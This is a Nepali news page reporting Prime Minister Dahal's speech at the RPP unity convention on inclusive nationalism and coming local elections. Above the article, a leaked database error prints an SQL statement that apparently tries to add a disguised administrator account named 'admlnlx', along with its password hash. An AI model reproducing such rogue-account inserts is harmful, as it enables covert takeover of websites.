WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk67rKy6xKcFAnaTZIgFIis/cq65SZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 03:06:31', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ६–
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले कुनै समुदाय र जाति विशेषलाई होच्याएर राष्ट्रवाद हुनै नसक्ने बताउनुभएको छ । राप्रपाको प्रथम एकता महाधिवेशनको उद्घाटन सत्रमा बोल्दै प्रधानमन्त्री दाहालले एमाले अध्यक्ष ओली तर्फ संकेत गर्दै हिमाल, पहाड, तराईका जनतालाई चिढ्याएर राष्ट्रवाद नहुने भन्दै सबैलाई मिलाएर लैजान सकिए मात्र सच्चा राष्ट्रवाद हुने बताउनुभयो । उहाँले भन्नुभयो–“कसैलाई होच्याएर, विभेदको दृष्टिकोणले हेरेर राष्ट्रवादी व्यक्ती हुन सक्दैन, हिमाल, पहाड र तराईलाई मिलाएर लैजान सकिए मात्रै सच्चा राष्ट्रवाद हुन्छ, म यसमा लागि रहेको छु ।” प्रधानमन्त्री दाहालले रापप्राले सबैलाई समेटेर लैजाने नीति पारित गर्दै सच्चा राष्ट्रवादी बन्नमा शुभकामना दिनुभयो ।
प्रधानमन्त्री दाहालले स्थानीय निकायको निर्वाचन विना संविधान कार्यान्वयन नहुने भन्दै यसका लागि सरकारले छिट्टै तिनै तहको निर्वाचनको मिति घोषणा गर्ने प्रष्ट पार्नुभयो । माओवादी केन्द्रका अध्यक्ष समेत रहनु भएका दाहालले आफूलाई राप्रपा सहकार्य गरौं गरौं जस्तो लाग्ने भन्दै धेरै टाँढा नजान आग्रह गर्नुभयो ।